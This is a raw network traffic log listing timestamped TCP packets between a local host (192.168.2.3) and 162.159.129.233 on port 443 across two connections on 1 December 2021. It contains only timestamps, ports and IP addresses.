Dec 1, 2021 16:22:56.367383003 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367393970 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367424965 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367429018 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.367450953 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.367468119 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.383831978 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.383987904 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384002924 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384028912 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384064913 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384069920 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384083033 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384116888 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384125948 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384149075 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384177923 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384201050 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384219885 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384289980 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384290934 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384309053 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384339094 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384365082 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384368896 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384386063 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384422064 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384439945 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384457111 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384516954 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384526968 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384545088 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384577036 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384602070 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384612083 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384629965 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384663105 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384686947 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384691954 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384707928 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.384743929 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.384767056 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.400717020 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.400799990 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.400831938 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.400842905 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.400870085 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.400907040 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.400913000 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.400943041 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.400974035 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.400979042 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.400985956 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.400996923 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401015043 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401020050 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401046991 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401076078 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401662111 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401726007 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401740074 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401752949 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401787996 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401801109 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401819944 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401865959 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401871920 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401880980 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401901960 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401911974 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401916981 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401930094 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.401959896 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.401998997 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402002096 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402025938 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402055979 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402085066 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402112007 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402185917 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402225018 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402230978 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402261019 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402260065 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402283907 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402288914 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402318954 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402353048 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402353048 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402383089 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402451038 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402520895 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402626038 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402676105 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402682066 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402714968 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402723074 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402740002 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402755976 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402826071 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402839899 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402847052 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402885914 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.402904987 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.402971029 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.403053045 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.403141022 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.403208017 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.403237104 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.403243065 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.403278112 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.403307915 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.418417931 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418481112 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418515921 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418564081 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.418582916 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418632984 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.418668032 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.418689013 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418737888 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418751955 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418771982 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.418781996 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.418853045 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.418992996 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419011116 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419110060 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.419123888 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419141054 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419176102 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.419177055 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419190884 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419230938 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.419271946 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.419383049 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419403076 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419440985 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419478893 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.419487953 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419514894 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:22:56.419555902 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.419616938 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.550775051 CET	49751	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:22:56.550822020 CET	443	49751	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.576085091 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.576138020 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.576250076 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.603044987 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.603079081 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.643464088 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.643573999 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.658366919 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.658382893 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.658775091 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.658863068 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.675101042 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.716878891 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.745959044 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746049881 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746061087 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746076107 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746125937 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746139050 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746187925 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746228933 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746243000 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746252060 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746273994 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746294022 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746299028 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746309996 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746355057 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746364117 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746392965 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746411085 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746418953 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746442080 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746448040 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746474028 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746474981 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746484041 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746504068 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746537924 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746555090 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746562958 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746597052 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746608019 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746629953 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746644020 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746651888 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746670008 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746678114 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746696949 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746702909 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746716976 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746735096 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746757030 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746774912 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746783018 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746793985 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746810913 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746824980 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746831894 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746857882 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746859074 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746885061 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746891022 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746897936 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746922970 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746926069 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746953011 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746953964 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746959925 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.746984959 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.746997118 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747020006 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747020960 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747028112 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747044086 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747066021 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747071028 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747078896 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747107029 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747123003 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747129917 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747144938 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747159004 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747175932 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747183084 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747194052 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747210026 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747246027 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.747252941 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.747292995 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763154030 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763226986 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763561964 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763611078 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763648987 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763664961 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763679028 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763695002 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763714075 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763720036 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763730049 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763768911 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763775110 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763787985 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763827085 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763840914 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763887882 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.763905048 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.763961077 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.764050007 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.764113903 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780380011 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780440092 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780473948 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780507088 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780555964 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780577898 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780616045 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780625105 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780690908 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780697107 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780740976 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780783892 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780785084 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780802011 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780842066 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780867100 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780914068 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780927896 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.780936003 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780952930 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.780997992 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781033993 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781042099 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781054974 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781069994 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781109095 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781110048 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781117916 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781160116 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781183958 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781192064 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781213045 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781219006 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781236887 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781243086 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781269073 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781270027 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781316996 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781317949 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781328917 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781339884 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781372070 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781380892 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781387091 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781409979 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781430006 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781436920 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781461000 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781464100 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781481028 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781486988 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781514883 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781523943 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781548023 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781553984 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781570911 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781580925 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781620026 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781625986 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781636953 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781701088 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781707048 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781721115 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781765938 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781783104 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781837940 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781841993 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781848907 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781888008 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781900883 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781943083 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781959057 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.781965971 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781980038 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.781989098 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.782013893 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.782020092 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.782051086 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.782088041 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.783299923 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.783335924 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.783406973 CET	49754	443	192.168.2.3	162.159.129.233
Dec 1, 2021 16:23:14.783418894 CET	443	49754	162.159.129.233	192.168.2.3
Dec 1, 2021 16:23:14.783482075 CET	49754	443	192.168.2.3	162.159.129.233
